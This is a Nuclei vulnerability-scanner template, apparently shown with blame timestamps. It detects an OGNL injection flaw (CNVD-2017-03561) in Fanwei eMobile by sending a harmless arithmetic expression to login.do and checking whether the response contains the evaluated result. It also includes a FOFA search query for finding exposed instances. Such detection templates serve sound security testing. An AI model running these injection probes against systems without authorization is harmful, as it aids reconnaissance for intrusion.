nuclei-templates/http/cnvd/2017/CNVD-2017-03561.yaml

42 lines
1.4 KiB
YAML
Raw Normal View History

2022-08-11 19:05:26 +00:00
id: CNVD-2017-03561
info:
2023-04-02 00:23:19 +00:00
name: Fanwei eMobile - OGNL Injection
2022-08-11 19:05:26 +00:00
author: ritikchaddha
severity: high
2023-04-13 18:04:03 +00:00
description: |
Fanwei eMobile contains an object graph navigation library vulnerability. An attacker can inject arbitrary JavaScript, thus possibly obtaining sensitive information from a database, modifying data, and executing unauthorized administrative operations in the context of the affected site.
2022-08-11 19:05:26 +00:00
reference:
- https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md
- https://reconshell.com/vulnerability-research-list/
2022-08-11 19:05:26 +00:00
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 2
2022-08-11 19:05:26 +00:00
fofa-query: app="泛微-eMobile"
2023-04-04 03:04:20 +00:00
tags: cnvd,cnvd2017,emobile,ognl,fanwei
2022-08-11 19:05:26 +00:00
variables:
2023-04-13 18:04:03 +00:00
num1: "{{rand_int(800000, 999999)}}"
num2: "{{rand_int(800000, 999999)}}"
result: "{{to_number(num1)*to_number(num2)}}"
2022-08-11 19:05:26 +00:00
http:
2022-08-11 19:05:26 +00:00
- method: GET
path:
- "{{BaseURL}}/login.do?message={{num1}}*{{num2}}"
- "{{BaseURL}}/login/login.do?message={{num1}}*{{num2}}"
stop-at-first-match: true
2023-10-14 11:27:55 +00:00
2022-08-11 19:05:26 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2023-04-13 18:04:03 +00:00
- "{{result}}"
2022-08-11 19:05:26 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022100a19d5752bad789894eba0dddececc58caa4a618e50d1f6d2109bbac1db709c8e02201a8311d7769252d7542068a74e72d0736274f596a91ebc45fb41e219b25e5fa7:922c64590222798bb761d5b6d8e72950